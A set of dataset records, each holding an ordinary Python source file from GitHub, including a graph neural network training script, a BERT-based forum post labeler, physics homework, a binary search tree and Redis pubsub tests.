)","repo_name":"libffcv/ffcv","sub_path":"ffcv/transforms/normalize.py","file_name":"normalize.py","file_ext":"py","file_size_in_byte":4912,"program_lang":"python","lang":"en","doc_type":"code","stars":2660,"dataset":"github-code","pt":"72"} +{"seq_id":"36133752484","text":"import os, sys\nimport tqdm\nimport argparse\nimport torch\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport pandas as pd\nimport time\n\nfrom FEGNN_model import FEGNN\nfrom utils import get_data, set_best_train_args\nfrom torch.utils.tensorboard import SummaryWriter\n\n\ndef one_run(args, seed, run, bar):\n \n torch.manual_seed(seed)\n if not args.no_cuda:\n torch.cuda.manual_seed(seed)\n\n args.seed = seed\n data = get_data(args) \n eye = torch.eye(args.nhid)\n model = FEGNN(ninput=data.x.shape[1], nclass=data.y.max()+1, args=args)\n\n if (not args.no_cuda) and torch.cuda.is_available():\n torch.cuda.set_device(args.cuda)\n data = data.cuda(args.cuda)\n model = model.cuda(args.cuda) \n eye = eye.cuda(args.cuda)\n\n optimizer = torch.optim.Adam(params=model.parameters(), lr=args.lr, weight_decay=args.weight_decay)\n\n if not args.no_earlystop:\n best_epoch = 0\n best_val_acc = 0.\n bad_epochs = 0\n best_test_acc = 0.\n best_val_loss = 9999\n val_loss_history = []\n val_acc_history = []\n\n start_time = time.time()\n\n for epoch in range(args.epochs):\n bar.set_description('Run:{:2d}, epoch:{:4d}'.format(run, epoch))\n model.train()\n output = model(data) \n \n loss = F.nll_loss(output[data.train_mask], data.y[data.train_mask])\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n \n model.eval()\n \n output_eval = model(data) \n pred_eval = output_eval.argmax(dim=1)\n correct_eval = (pred_eval == data.y)\n\n val_loss = F.nll_loss(output_eval[data.val_mask], data.y[data.val_mask])\n val_acc = correct_eval[data.val_mask].sum() / data.val_mask.sum()\n test_acc = correct_eval[data.test_mask].sum() / data.test_mask.sum()\n\n bar.set_postfix(train_loss='{:.4f}'.format(loss.item()), \n val_loss='{:.4f}'.format(val_loss.item()),\n val_acc='{:.4f}'.format(val_acc.item()))\n\n if epoch > args.warmup: # warm up = 50\n\n val_loss_history.append(val_loss.item())\n val_acc_history.append(val_acc.item())\n\n if val_loss < best_val_loss:\n best_val_acc = val_acc\n best_val_loss = val_loss\n best_test_acc = test_acc\n best_epoch = epoch\n\n if not args.no_earlystop and epoch > args.patience + args.warmup:\n tmp_loss = torch.tensor(\n val_loss_history[-(args.patience + 1):-1])\n if val_loss > tmp_loss.mean().item():\n runtime = time.time() - start_time\n epoch_time = runtime / (epoch + 1)\n print(epoch_time)\n print('Best epoch %d for run %d: train loss: %.4f, val loss: %.4f, val acc: %.4f, test acc %.4f'%(\n best_epoch, run, loss, best_val_loss, best_val_acc, best_test_acc))\n break\n \n return best_test_acc.item(), best_val_acc.item()\n\n\ndef main():\n torch.set_num_threads(2)\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--no-cuda', action='store_true', default=False,\n help='Disables CUDA training.')\n parser.add_argument('--cuda', type=int, default=2, help='Cuda device.')\n parser.add_argument('--seed', type=int, default=42, help='Random seed (no use).')\n \n parser.add_argument('--dataset', type=str, default='cora', help='Data set.')\n \n parser.add_argument('--dropout', type=float, default=0.5)\n\n\n parser.add_argument(\"--poly\", type=str, default='gpr', choices=['gpr', 'cheb', 'cheb2', 'bern', 'gcn', 'ours'])\n parser.add_argument('--K', type=int, default=2)\n\n parser.add_argument('--attn_nhid', type=int, default=8)\n parser.add_argument('--nhid', type=int, default=64)\n parser.add_argument('--xb', action='store_true', default=False)\n\n # training parameters\n parser.add_argument('--weight_decay', type=float, default=5e-4, help='Weight decay for linear')\n parser.add_argument('--lr', type=float, default=0.01, help='Initial learning rate.')\n parser.add_argument('--epochs', type=int, default=1000, help='Number of epochs to train.')\n parser.add_argument('--no_earlystop', action='store_true', default=False, help='Set to voyage the whole epochs.')\n parser.add_argument('--patience', type=int, default=200, help='Heads of distribution attention.')\n parser.add_argument('--runs', type=int, default=10, help='Runs to train.')\n\n # split parameters\n parser.add_argument('--split', type=str, default='random', choices=['random', 'set', 'grand'])\n parser.add_argument('--train_proportion', type=float, default=0.6, help='Train proportion')\n parser.add_argument('--val_proportion', type=float, default=0.2, help='Valid proportion')\n parser.add_argument('--idx', type=int, default=0, help='For multiple graphs, e.g. ppi has 20 graphs')\n\n parser.add_argument('--d', type=int, default=0, help='random dicts')\n parser.add_argument('--base', type=int, default=-1, help='random dicts')\n\n # # reg\n # parser.add_argument('--ortho', type=float, default=0., help='Dictionary matrix othogonal regularization')\n # parser.add_argument('--sp1', type=float, default=0., help='lin1 sparsity regularization')\n # parser.add_argument('--sp2', type=float, default=0., help='lin2 sparsity regularization')\n\n # FEGNN\n parser.add_argument('--nx', type=int, default=-1, help='hidden size for the node feature subdictionary, default -1 for use the feature\\'s size')\n parser.add_argument('--nlx', type=int, default=-1, help='hidden size for the interaction subdictionary, default -1 for use the feature\\'s size')\n parser.add_argument('--nl', type=int, default=0, help='hidden size for the sturcture subdictionary, default 0 for not using this subdictionary') # chameleon 700, squirrel 2000\n parser.add_argument('--share_lx', action='store_true', default=False, help='share the same w1 for different hops of lx')\n parser.add_argument('--warmup', type=int, default=50, help='random dicts')\n parser.add_argument('--no_use_best_args', action='store_true', default=False)\n\n args = parser.parse_args()\n if args.dataset.lower() in ['cs', 'physics']:\n args.split = 'grand'\n elif args.dataset.lower() in ['computers', 'photo', 'chameleon', 'squirrel', 'actor', 'texas', 'cornell']:\n args.split = 'random'\n\n if not args.no_use_best_args: # if use the best params\n args = set_best_train_args(args)\n print(args)\n\n for time in range(1):\n seeds=[0,1,2,3,4,5,6,7,8,9]\n\n pbar = tqdm.tqdm(range(args.runs))\n\n\n test_accs = []\n val_accs = []\n\n for idx in pbar:\n test_acc, val_acc = one_run(args, seed=seeds[idx], run=idx, bar=pbar)\n test_accs.append(test_acc)\n val_accs.append(val_acc)\n\n test_acc_mean = torch.Tensor(test_accs).mean().item()\n val_acc_mean = torch.Tensor(val_accs).mean().item()\n\n print('Average Test acc for {:s}: {:.4f}, Val acc: {:.4f}'.format(args.dataset, test_acc_mean, val_acc_mean))\n\n\nif __name__ == '__main__':\n main()\n \n\n\n\n \n \n \n\n","repo_name":"sajqavril/Feature-Extension-Graph-Neural-Networks","sub_path":"train_FEGNN.py","file_name":"train_FEGNN.py","file_ext":"py","file_size_in_byte":7242,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"13806929845","text":"import pandas as pd\n\ndef combinacao3() :\n relacao = list()\n for d1 in range(1,3):\n for d2 in range (0,3):\n for d3 in range (0, 3):\n for pot in range (-2, 2, 1):\n resultado = (d1* pow(3, -1) + d2 * pow(3, -2) + d3 * pow(3, -3)) * pow(3,pot)\n linha = (\"Combinação 0.{}{}{} x 3^{}\".format(d1, d2, d3, pot) , resultado);\n relacao.append(linha)\n return relacao\n\ndef main():\n \n tabela = pd.DataFrame(combinacao3(), columns=[\"Mantissa base 3\" , \"Decimal\"])\n print(tabela)\n \n return 1\n\nmain()","repo_name":"guilhermegbraz/CalculoNumerico-UFABC-2022.3","sub_path":"Métodos encontrar raiz/src/python/combinacoes.py","file_name":"combinacoes.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31018768416","text":"from Bert.basic_semantic_search import BertSemanticSearch\nfrom data_loader import DataLoader\nfrom labeler import Labeler\n\nif __name__ == \"__main__\":\n posts_path = r\"C:\\Users\\karlc\\Documents\\uoft\\CSC492\\CSC108&148v2\\csc148h5_spring2020_2020-05-03\\anon.contributions.csv\"\n path_corpus = r\"C:\\Users\\karlc\\Documents\\uoft\\CSC492\\CSC108&148v2\\csc148h5_spring2020_2020-05-03\\corpus.pkl\"\n path_corpus_embeddings = r\"C:\\Users\\karlc\\Documents\\uoft\\CSC492\\CSC108&148v2\\csc148h5_spring2020_2020-05-03\\corpus_embeddings.pkl\"\n label_path = r\"C:\\Users\\karlc\\Documents\\uoft\\CSC492\\CSC108&148v2\\csc148h5_spring2020_2020-05-03\\Labeler.pkl\"\n\n data_loader = DataLoader()\n data_loader.load(posts_path)\n\n qs, followup_qs = data_loader.questions_in_folder(\"\", index=True)\n as2, followup_as2 = data_loader.questions_in_folder(\"assignment2\", index=True)\n\n bert_s_s = BertSemanticSearch().from_files(path_corpus, path_corpus_embeddings)\n\n # label dataset\n labeler = Labeler(label_path)\n\n for i in range(len(as2)):\n idx, text = as2[i]\n choices_idx = bert_s_s.single_semantic_search(text, 10)\n\n labeler.label(\n text=text,\n text_idx=idx,\n choices=[qs[int(choice_idx)][1] for choice_idx in choices_idx],\n choices_idx=[qs[int(choice_idx)][0] for choice_idx in choices_idx]\n )\n print(labeler.labels)\n\n labeler.save()\n\n\n","repo_name":"Karl-Cui/piazzabot","sub_path":"label_with_bert.py","file_name":"label_with_bert.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12941912019","text":"# Function definition\n\ndef f(x):\n return 3 * x ** 2 - 2 * x + 5\n\n# Pure function\ndef pure_fun_sum(x, y):\n # use only the local function inputs\n return x + y\n\ndef crazy_function():\n return\n\nwhat_is_it = crazy_function()\n\ndef do_nothing_useful(i, j):\n x = i + j\n x = i - j\nresult = do_nothing_useful(10, 12)\nprint(result)\n# >>> print(result)\n# None\n\n# lambda functions\nlambda_add = lambda x, y: x +y\n\ndef greet01(name):\n print ('Ciao ', name)\n \ngreet02 = lambda name: print('Ciao ', name)\n\n# GUI, Callbacks\nimport sys\nfrom tkinter import Button, mainloop, messagebox, ttk\nimport tkinter as tk\nwin = tk.Tk()\nwin.geometry('400x300')\nwin.title('Using lambda callbacks')\n\ncombo = ttk.Combobox(\n state=\"readonly\",\n values=[\"imperative\", \"Object-Oriented\", \"Functional\", \"Distributed\"]\n )\ncombo.place(x=50, y=50)\n\nbtn = Button (\n win, text='Click Me',\n command=(lambda : messagebox.showinfo(\n 'Paradigm', combo.get() + \n '\\nProgramming!'\n )))\n\n# btn.pack()\nbtn.place(x=50, y=100)\nwin.mainloop()\n\n# lambda\ntpl = (2019, 3480.65)\nfst = lambda x: x[0]\nsnd = lambda x: x[1]\n\n\nfrom functools import reduce\nvlst = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]\nsummed_val = reduce(lambda n, m: n + m, vlst)\nfirst_val = reduce(lambda n, _: n, vlst)\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# Using pandas\n# ============\nimport pandas as pd\narray = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]])\nseries3 = pd.DataFrame(array, columns=['Jan_23', 'Feb_23', 'Mar_23'])\nseries3\n\n","repo_name":"senker/programming-concepts-n-languages","sub_path":"python/session10-homework/class-session10.py","file_name":"class-session10.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"78732828","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.integrate import dblquad\nfrom scipy.integrate import nquad\n\n#####1\na = open('et.dat', 'r')\na_line = a.readlines()[1:]\n\ne = np.zeros(len(a_line))\nx = np.zeros(len(a_line))\n\nfor ii,i in enumerate(a_line):\n e[ii] = float(i.split(\" \")[0])\n x[ii] = float(i.split(\" \")[1])\n\ne_median = np.median(e)\ne_mean = np.mean(e)\n\nsigma_mu = np.sqrt(np.sum((e-e_mean)**2)/(len(e)*(len(e)-1)))\n\nprint(\"1.(1) e_median = \",e_median)\nprint(\" standard deviation of the mean = \",sigma_mu,\"\\n\")\n\n\nn = 1000\n\nmed_bost = np.zeros(n)\n\nfor i in range(n):\n xi = np.random.randint(len(e),size = len(e))\n sample_bost = e[xi]\n med_bost[i] = np.median(sample_bost)\n\nsort_med_bost = np.sort(med_bost)\n\n# fig , ax = plt.subplots(1)\n# ax.hist(sort_med_bost,40)\n# ax.axvline(sort_med_bost[841],color = 'r', linestyle='--')\n# ax.axvline(sort_med_bost[158],color = 'r', linestyle='--')\n# plt.show()\n\nprint(\" (2) upper(15.9%) std = \", sort_med_bost[840]- sort_med_bost[500])\nprint(\" lower(15.9%) std = \", sort_med_bost[499]- sort_med_bost[159],\"\\n\")\n\ne = e[(x<-10.6)]\n\nmed_bost2 = np.zeros(n)\n\nfor j in range(n):\n xj = np.random.randint(len(e),size = len(e))\n sample_bost = e[xj]\n med_bost2[j] = np.median(sample_bost)\n\nsort_med_bost2 = np.sort(med_bost2)\n\nprint(\" (3) e_mask_median = \",np.median(e))\nprint(\" bootstrap std = \",sort_med_bost2[840]-sort_med_bost[500],sort_med_bost2[159]-sort_med_bost2[499])\n\n#####2\nn = 1000\n\ndef gx(r,theta,pi):\n f = lambda rr , pp : (r*np.cos(theta)*np.cos(pi)-rr*np.cos(pp))/(r**2+rr**2-2*r*rr*np.cos(theta)*np.cos(pp-pi))**(3/2)\n options={'limit':n}\n res, err = nquad(f, [[0, 2*np.pi], [0, 1]],opts=[options,options])\n return (1/np.pi)*res \n\ndef gy(r,theta,pi):\n f = lambda rr , pp : (rr*np.sin(pp)- r*np.cos(theta)*np.sin(pi))/(r**2+rr**2-2*r*rr*np.cos(theta)*np.cos(pp-pi))**(3/2)\n options={'limit':n}\n res, err = nquad(f, [[0, 2*np.pi], [0, 1]],opts=[options,options])\n return (1/np.pi)*res\n\ndef gz(r,theta,pi):\n f = lambda rr , pp : (r*np.sin(theta))/(r**2+rr**2-2*r*rr*np.cos(theta)*np.cos(pp-pi))**(3/2)\n options={'limit':n}\n res, err = nquad(f, [[0, 2*np.pi], [0, 1]],opts=[options,options])\n return (1/np.pi)*res \n\nprint(gy(0.1,0,0))\n\n# def gx(r,theta,pi):\n# f = lambda rr , pp : (r*np.cos(theta)*np.cos(pi)-rr*np.cos(pp))/(r**2+rr**2-2*r*rr*np.cos(theta)*np.cos(pp-pi))**(3/2)\n# # return dblquad(f, 0, 2*np.pi, lambda pp:0, lambda pp:1)\n# res, err = dblquad(f, 0, 2*np.pi, lambda pp:0, lambda pp:1,limit = 100)\n# return (1/np.pi)*res\n\n# def gy(r,theta,pi):\n# f = lambda rr , pp : (rr*np.sin(pp)- r*np.cos(theta)*np.sin(pi))/(r**2+rr**2-2*r*rr*np.cos(theta)*np.cos(pp-pi))**(3/2)\n# res, err = dblquad(f, 0, 2*np.pi, lambda pp:0, lambda pp:1,limit = 100)\n# return (1/np.pi)*res\n\n# def gz(r,theta,pi):\n# f = lambda rr , pp : (r*np.sin(theta))/(r**2+rr**2-2*r*rr*np.cos(theta)*np.cos(pp-pi))**(3/2)\n# res, err = dblquad(f, 0, 2*np.pi, lambda pp:0, lambda pp:1, limit = 100)\n# return (1/np.pi)*res\n\n# def g(r,theta,pi):\n# return np.sqrt(gx(r,theta,pi)**2 + gy(r,theta,pi)**2 + gz(r,theta,pi)**2)\n\n# def g0(r):\n# return np.abs(2*(r/((1+r**2)**(1/2))-1))\n\n# print(g(50,0,10))\n# print(g0(50))\n\n\n","repo_name":"kj2063/Astrophysics_Assignments","sub_path":"ScientificComputing_HW4/homework4.py","file_name":"homework4.py","file_ext":"py","file_size_in_byte":3281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22911078918","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef get_g(vals):\n return np.average(np.gradient((vals)))\n\ndata = np.genfromtxt('output')\nxs = data[:, 0]\nys = data[:, 1]\nx_grad = get_g(xs)\ny_grad = get_g(ys)\nm_g = np.sqrt(x_grad**2 + y_grad**2)\nprint(\"Gradient: %.4f\" % m_g)\nwidth = int(25)\nplt.plot(xs, ys)\nplt.text(width- 7, 0, \"Gradient: %.4f\" % m_g)\nplt.xlabel(\"Mean x displacment.\")\nplt.ylabel(\"Mean y displacment.\")\nplt.title(\"Glider position changing with time.\")\nplt.show()\n","repo_name":"IainMcl/Modeling-and-Visualisation-in-Physics","sub_path":"Checkpoint 2/Game of Life/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1669388921","text":"import sys\ndef car_type(car):\n '''str -> str'''\n message = ''\n if car == '1' or car.lower() == 'one':\n car_type = 'Bugatti Veyron'\n elif car == '2' or car.lower() == 'two':\n car_type = 'R.R Drophead Phantom Coupe'\n elif car == '3' or car.lower() == 'three':\n car_type = 'Lambo Murcielago'\n elif car == '4' or car.lower() == 'four':\n car_type = 'Ferrari F450'\n elif car == '5' or car.lower() == 'five':\n car_type = 'Lambo Gallardo'\n return car_type \n\n# def r_value(car):\n# '''str -> str'''\n# message = ''\n# if car == '1' or car.lower() == 'one':\n# r_value = '1300000'\n# elif car == '2' or car.lower() == 'two':\n# r_value = '450000'\n# elif car == '3' or car.lower() == 'three':\n# r_value = '250000'\n# elif car == '4' or car.lower() == 'four':\n# r_value = '210000'\n# elif car == '5' or car.lower() == 'five':\n# r_value = '200000'\n# return r_value \n\ndef car_price(car, days):\n '''(str) -> float'''\n if car == '1':\n price = float(days) * 40000\n sales_tax = 0.07\n tax = price * sales_tax\n total_price = price + tax\n return total_price\n elif car == '2':\n price = float(days) * 3500\n sales_tax = 0.07\n tax = price * sales_tax\n total_price = price + tax\n return total_price\n elif car == '3':\n price = float(days) * 2250\n sales_tax = 0.07\n tax = price * sales_tax\n total_price = price + tax\n return total_price \n elif car == '4':\n price = float(days) * 1675\n sales_tax = 0.07\n tax = price * sales_tax\n total_price = price + tax\n return total_price\n elif car == '5':\n price = float(days) * 1600\n sales_tax = 0.07\n tax = price * sales_tax\n total_price = price + tax\n return total_price\n\n\n","repo_name":"abull2018/rental_store_austinbullard","sub_path":"core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34401257896","text":"class BSTNode:\n\t\n def __init__(self, key, val, parent):\n self.NodeKey = key\n self.NodeValue = val\n self.Parent = parent\n self.LeftChild = None\n self.RightChild = None\n\n def setRightChild(self,Node):\n self.RightChild = Node\n\n def setLeftChild(self,Node):\n self.LeftChild = Node\n\n def setParent(self, Node):\n self.Parent = Node\n\n def getLeftChild(self):\n return self.LeftChild\n\n def getRightChild(self):\n return self.RightChild\n\n def getParentNode(self):\n return self.Parent\n\n def isLeftChild(self):\n return self.LeftChild\n\n def isRightChild(self):\n return self.RightChild\n\n def isParent(self):\n return self.Parent\n \n def isEmptyRoot(self):\n return self.Root == None\n \n def isKeysEqual(self,key):\n return self.NodeKey == key\n \n def isNodeKeyLardge(self,key):\n return self.NodeKey > key\n\n\nclass BSTFind:\n\n def __init__(self):\n self.Node = None\n self.NodeHasKey = False\n self.ToLeft = False\n \n def isBSTToLeft(self):\n return self.ToLeft\n\n def getBSTNode(self):\n return self.Node\n\n def isNodeHasKey(self):\n return self.NodeHasKey\n\n def setLinkNode(self,Node):\n self.Node = Node\n\n def setNodeHasKey(self,bool = False):\n self.NodeHasKey = bool\n\n def setToLeft(self,bool = False):\n self.ToLeft = bool\n\n\nclass BST:\n\n def __init__(self, node):\n self.Root = node\n\n def getRootNode(self):\n return self.Root\n\n def FindNodeByKey(self, key):\n BSTFindNode = BSTFind()\n if BSTNode.isEmptyRoot(self): return BSTFindNode\n Node = self.getRootNode()\n while Node:\n BSTFindNode.setLinkNode(Node)\n if Node.isKeysEqual(key): \n BSTFindNode.setNodeHasKey(True) \n return BSTFindNode\n if Node.isNodeKeyLardge(key):\n Node = Node.getLeftChild()\n BSTFindNode.setToLeft(True)\n else: \n Node = Node.getRightChild()\n BSTFindNode.setToLeft()\n return BSTFindNode\n\n\n def AddKeyValue(self, key, val):\n resultatFindNode = self.FindNodeByKey(key)\n if resultatFindNode.isNodeHasKey():\n return False\n newNodeInAdd = BSTNode(key,val,resultatFindNode.getBSTNode())\n if resultatFindNode.getBSTNode() == None:\n self.Root = newNodeInAdd\n elif not resultatFindNode.isBSTToLeft():\n resultatFindNode.getBSTNode().setRightChild(newNodeInAdd)\n else:\n resultatFindNode.getBSTNode().setLeftChild(newNodeInAdd)\n return True\n \n def FinMinMax(self, FromNode, FindMax):\n resultatFindNode = FromNode\n if FindMax:\n while resultatFindNode.getRightChild() != None:\n resultatFindNode = resultatFindNode.getRightChild()\n else:\n while resultatFindNode.getLeftChild() != None:\n resultatFindNode = resultatFindNode.getLeftChild()\n if resultatFindNode == FromNode: return None\n return resultatFindNode\n\n\n def ParentLeftChild(self,ReceivingNode,NodeToDelete):\n return (True if ReceivingNode.getLeftChild() == NodeToDelete else False)\n\n def DeleteNodeByKey(self, key):\n NodeToDelete = self.FindNodeByKey(key)\n if not NodeToDelete.isNodeHasKey(): \n return False \n NodeToDelete = NodeToDelete.getBSTNode()\n if not NodeToDelete.getLeftChild() and not NodeToDelete.getRightChild():\n if not NodeToDelete.getParentNode(): self.Root = None\n else:\n ParentNode = NodeToDelete.getParentNode()\n if self.ParentLeftChild(ParentNode,NodeToDelete):\n ParentNode.setLeftChild(None)\n else: ParentNode.setRightChild(None)\n else:\n if NodeToDelete.getLeftChild() and NodeToDelete.getRightChild():\n ReceivingNode = NodeToDelete.RightChild\n if ReceivingNode.getLeftChild():\n ReceivingNode = self.FinMinMax(ReceivingNode,False)\n if ReceivingNode.getRightChild():\n ReceivingNode.getRightChild().setParent(ReceivingNode.getParentNode())\n ReceivingNode.getParentNode().setLeftChild(ReceivingNode.getRightChild())\n else: ReceivingNode.getParentNode().setLeftChild(None)\n ReceivingNode.setRightChild(NodeToDelete.getRightChild())\n NodeToDelete.getRightChild().setParent(ReceivingNode)\n NodeToDelete.getLeftChild().setParent(ReceivingNode)\n ReceivingNode.setLeftChild(NodeToDelete.getLeftChild())\n elif NodeToDelete.getRightChild():\n ReceivingNode = NodeToDelete.getRightChild()\n else: ReceivingNode = NodeToDelete.getLeftChild() \n if NodeToDelete.getParentNode():\n ReceivingNode.setParent(NodeToDelete.getParentNode())\n ParentNode = NodeToDelete.getParentNode()\n if self.ParentLeftChild(ParentNode,NodeToDelete): \n ParentNode.setLeftChild(ReceivingNode)\n else: ParentNode.setRightChild(ReceivingNode)\n else:\n self.Root = ReceivingNode\n ReceivingNode.setParent(None)\n NodeToDelete.setParent(None)\n NodeToDelete.setLeftChild(None)\n NodeToDelete.setRightChild(None)\n return True\n\n def Count(self):\n def RecursionNode(Node):\n if Node:\n self.counter += 1\n RecursionNode(Node.LeftChild)\n RecursionNode(Node.RightChild)\n self.counter = 0\n RecursionNode(self.Root)\n return self.counter\n\n def DeepAllNodes(self, parameter):\n ResultatDeepInNodes = []\n\n def PreOrder(Node,ResultatDeepInNodes):\n if Node:\n ResultatDeepInNodes.append(Node)\n PreOrder(Node.getLeftChild(),ResultatDeepInNodes)\n PreOrder(Node.getRightChild(),ResultatDeepInNodes)\n\n def PostOrder(Node,ResultatDeepInNodes):\n if Node:\n PostOrder(Node.getLeftChild(),ResultatDeepInNodes)\n PostOrder(Node.getRightChild(),ResultatDeepInNodes)\n ResultatDeepInNodes.append(Node)\n\n def InOrder(Node,ResultatDeepInNodes):\n if Node:\n InOrder(Node.getLeftChild(),ResultatDeepInNodes)\n ResultatDeepInNodes.append(Node)\n InOrder(Node.getRightChild(),ResultatDeepInNodes)\n \n if parameter == 0: \n InOrder(self.Root,ResultatDeepInNodes)\n elif parameter == 1:\n PostOrder(self.Root,ResultatDeepInNodes)\n else:\n PreOrder(self.Root,ResultatDeepInNodes)\n return tuple(ResultatDeepInNodes)\n\n def WideAllNodes(self):\n Node = self.Root\n if self.Root == None: return None\n ResultatWideInNodes = [Node]\n TempArray = [Node]\n while TempArray:\n NodesLevel = []\n for NodeArray in TempArray:\n if NodeArray.isLeftChild():\n NodesLevel.append(NodeArray.getLeftChild())\n if NodeArray.isRightChild():\n NodesLevel.append(NodeArray.getRightChild())\n [ResultatWideInNodes.append(i) for i in NodesLevel]\n TempArray = NodesLevel\n return tuple(ResultatWideInNodes)\n","repo_name":"SvStranik/trees-graph","sub_path":"TreeTraversalMethods.py","file_name":"TreeTraversalMethods.py","file_ext":"py","file_size_in_byte":7591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41004551444","text":"# 문제는 준원이가 최후의 승자가 되는 것..... 준원이 외 생존자가 있으면 안 됨!!\nn = int(input())\na = list(map(int, input().split()))\n준원 = a[0]\n# 공격력이 낮은 애들부터 공격하도록 정렬하기\na = a[1:]\na.sort()\nfor i in range(n-1):\n # 준원이 이기면 준원이 공격력 상승!\n if a[i] < 준원:\n 준원 += a[i]\n # 준원이 이길 수 없는 상대 혹은 비겨서 생존자가 나타나면 끝\n elif a[i] >= 준원:\n print(\"No\")\n break\nelse:\n print(\"Yes\")","repo_name":"angiekim05/study","sub_path":"Baekjoon/silver/22993.py","file_name":"22993.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"8185628871","text":"\n# -*- coding: utf-8 -*-\n\n\"\"\"Tests pubsub functionality.\"\"\"\n\nimport gevent\nimport time\nimport requests\n\nfrom flask import json\nfrom gevent.queue import Queue\nfrom yoapi.urltools import UrlHelper\n\nfrom . import BaseTestCase\n\nfrom yoapi.services import redis_pubsub\nfrom yoapi.extensions.pubsub import AlreadyRegisteredError\n\n\nclass PubSubTestCase(BaseTestCase):\n\n counter = 0\n payload = {'Hello': 'World'}\n\n def callback(self, data):\n \"\"\"Callback for pubsub messages\"\"\"\n self.assertEquals(data, self.payload)\n self.counter += 1\n\n def callback_b(self, data):\n \"\"\"Callback for pubsub messages\"\"\"\n self.assertEquals(data, self.payload)\n self.counter += 1\n\n def test_channel(self):\n \"\"\"Test that redis pubsub works\"\"\"\n\n channel = 'test-channel'\n\n with self.app.test_request_context():\n self.become(self._user1)\n # Register the client and start the pubsub manager.\n redis_pubsub.register(self.callback, channel)\n\n # Check that the call counter increments as expected.\n redis_pubsub.publish(self.payload, channel=channel)\n # Allow for context switch so our message gets processed.\n gevent.sleep(0.01)\n self.assertEquals(self.counter, 1)\n\n # Check that the call counter does not increment if we publish to a\n # different channel.\n redis_pubsub.publish(self.payload, channel='other-channel')\n # Allow for context switch so our message gets processed.\n gevent.sleep(0.01)\n self.assertEquals(self.counter, 1)\n\n redis_pubsub.close()\n\n def test_unregister(self):\n\n channel = 'test-channel'\n\n with self.app.test_request_context():\n self.become(self._user1)\n # Test that registered channel is subscribed.\n redis_pubsub.register(self.callback, channel)\n self.assertIn(channel, redis_pubsub.channels)\n\n # Test that registering the same channel and same function raises\n # an error.\n\n self.assertRaises(AlreadyRegisteredError, redis_pubsub.register,\n self.callback, channel)\n\n # Register another listener on the same channel and unregister the\n # first registration.\n redis_pubsub.register(self.callback_b, channel)\n redis_pubsub.unregister(self.callback, channel)\n\n # Assert the channel is still subscribed.\n self.assertIn(channel, redis_pubsub.channels)\n\n # Unsubscribe the second registration and assert that the channel is\n # no longer subscribed.\n redis_pubsub.unregister(self.callback_b, channel)\n redis_pubsub.close()\n","repo_name":"YoApp/yo-api","sub_path":"tests/pubsub_tests.py","file_name":"pubsub_tests.py","file_ext":"py","file_size_in_byte":2783,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"74852379753","text":"# 简单理解,__init__就是构造函数\nclass Person:\n age = 0\n name = \"Unknown\"\n gender = \"Unknown\"\n\n # def __init__(self) -> None:\n # self.age = 18d\n # self.name = \"Kakyoin\"\n # self.gender = \"male\"\n # 注意,一个类只能有一个构造函数,不能同时有默认构造函数和有参构造函数\n\n def __init__(self, name, age, gender) -> None:\n '这种带下划线的函数是py的内置特殊函数,又叫做魔术方法'\n self.name = name\n self.age = age\n self.gender = gender\n\n def showSelf(self):\n print(\"%s %d %s\" % (self.name, self.age, self.gender))\n\n\nperson1 = Person(\"Kakyoin\", 18, \"Male\")\nperson1.showSelf()\n# person2 = Person()\n# person2.showSelf()\n","repo_name":"529106896/PythonLearning","sub_path":"py-project/07-面向对象1/02-init方法.py","file_name":"02-init方法.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6722104865","text":"\nif __name__ == \"__main__\":\n dist = []\n with open(\"7-dat.txt\") as data:\n points = list(map(int, data.__next__().split(\",\")))\n\n # points = [16, 1, 2, 0, 4, 2, 7, 1, 2, 14]\n\n for i, p1 in enumerate(range(max(points))):\n dist.append([])\n for p2 in points:\n # print(p1, p2, abs(p1-p2))\n dist[i].append(sum(range(abs(p1-p2)+1)))\n # print(dist[i])\n # print()\n\n sum_dist = [sum(d) for d in dist]\n\n print(min(sum_dist))","repo_name":"MiraiKami/AoC2021","sub_path":"07-12/07-12.py","file_name":"07-12.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25803229726","text":"'''\nCreated on Feb 18, 2014\n\n@author: leal\n'''\n\nfrom launcher import Launcher\n\nimport logging\nimport sys\nimport StringIO\nimport contextlib\nimport os\nfrom multiprocessing import Process, Queue\n\nlogger = logging.getLogger(__name__) \n\n \n\nclass PythonScriptLauncher(Launcher,Process):\n '''\n \n The python launcher \n USE:\n globalVariables\n localVariables\n To keep a thread in the execution!\n \n \n The script send as command should read variables:\n param - input parameters\n set the result as \n result - variable\n \n \n '''\n \n def __init__(self, initParams=None):\n '''\n \n ''' 